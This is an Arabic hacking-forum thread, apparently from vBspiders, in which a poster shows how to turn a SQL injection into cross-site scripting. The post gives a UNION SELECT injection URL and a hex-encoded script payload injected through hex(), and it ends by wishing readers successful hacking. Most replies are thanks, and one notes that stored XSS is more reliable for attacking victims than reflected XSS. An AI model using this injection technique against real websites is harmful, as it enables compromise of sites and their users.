|
العلاقة ما بين SQL injection & XSS السلام عليكم ، الجميع يعرف الحقن والثغرة الاخرىى ولكن هل يمكننا استغلال ثغرة الحقن لتوليد xss يمكن ذلك ولكن بعدة شروط ، الشرط الاول : - ظهور الاعمدة المصابة في الصفحة مثلا 1و2و3 .... الشرط الثاني: - دالة hex تكون غير محظورة لاننا سنتغلها لحقن كود الجافا، نأتي للطريقة : مثلا لديك رابط حقن في الموقع كود: http://www.site.com/index.php?id=-1+union+select+1--ونشفر الكود ***************('9');</script> بستخدام اي موقع تشفير او اضافة firefox المسماة hackbar انا شفرتها لكم : كود: 0x3c7363726970743e616c6572742839293b3c2f7363726970743eكود: http://www.site.com/index.php?id=-1+union+select+hex(0x3c7363726970743e616c6572742839293b3c2f7363726970743e)--في الختام اختراق موفق ، اذا عجبك الموضوع قيمني |
مشكور |
هه حلو يا ايروون موضوع مميز من عضو اكثر من مميز هه |
مشكور ياحب عل شرح والتوضيح |
مشكور |
بارك الله فيك أخي موضوع أكثر من الرائع |
وين التقييم ،؟؟؟ لا بأس هناك بعد الثغرات اصبحت مدموجة مع بعض ونوعا ما ثغرة xss اصبحت تطفو إلى السطح والاهتمام يزيد بها ولكن للأسف الثغرة المخزنة في قواعد البيانات افضل من الثغرة الانية ( ارسال رابط للضحية ) لان نسبة الاخيرة في الفشل هي اكبر |
شرح رائع مشكوووور |
رد: العلاقة ما بين SQL injection & XSS |
رد: العلاقة ما بين SQL injection & XSS خطوة صحيحة مشكور ع المعلومة واصل تمييزك |
رد: العلاقة ما بين SQL injection & XSS جزاك الله خير |
رد: العلاقة ما بين SQL injection & XSS جزاك الله خير |
رد: العلاقة ما بين SQL injection & XSS شكلة موضوع جامد بس انا دخلت للعميق ولسا مادخلت للبدايه .، شكرا لك استاذي القدير |
| الساعة الآن 10:26 PM |
[ vBspiders.Com Network ]